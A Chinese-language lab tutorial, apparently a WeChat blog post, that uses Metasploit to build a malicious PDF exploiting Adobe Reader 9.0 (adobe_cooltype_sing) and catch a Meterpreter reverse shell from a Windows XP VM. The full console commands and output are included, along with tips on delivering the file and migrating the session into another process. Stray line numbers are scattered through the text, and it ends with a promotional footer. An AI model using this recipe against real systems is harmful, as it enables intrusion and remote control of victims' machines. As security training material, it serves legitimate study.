# 基于PDF文件格式的渗透攻击
攻击机 Kali 192.168.175.128
靶机 WinXP 192.168.175.130
漏洞程序: Adobe Reader 9.0
# 生成PDF文件
msfconsole
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
show options
exploit
1
2
3
4
5
6
2
3
4
5
6
具体如下所示:
msf5 > use exploit/windows/fileformat/adobe_cooltype_sing
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > show options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.175.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (RHOST and RPORT settings will be ignored!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf5 exploit(windows/fileformat/adobe_cooltype_sing) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
可以看到在/root/.msf4/local/目录下生成了msf.pdf。
实际中,我们需要想办法将这个文件传到靶机上。这里为了简单,我直接将文件拷贝到靶机上。
# 上传PDF到靶机
将生成的msf.pdf上传到靶机
# 实施攻击
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
exploit
1
2
3
4
5
6
2
3
4
5
6
具体如下:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# 打开PDF文件
在靶机上利用Adobe Reader 9.0打开PDF文件
# 查看获得的Meterpreter
在攻击机Kali上,我们看到MSF控制台中获得了Meterpreter权限。
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1431) at 2019-01-24 16:05:52 +0800
meterpreter >
1
2
3
4
5
6
7
2
3
4
5
6
7
最后,最好用migrate命令将当前会话进程绑定到系统的其他进程中。
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!
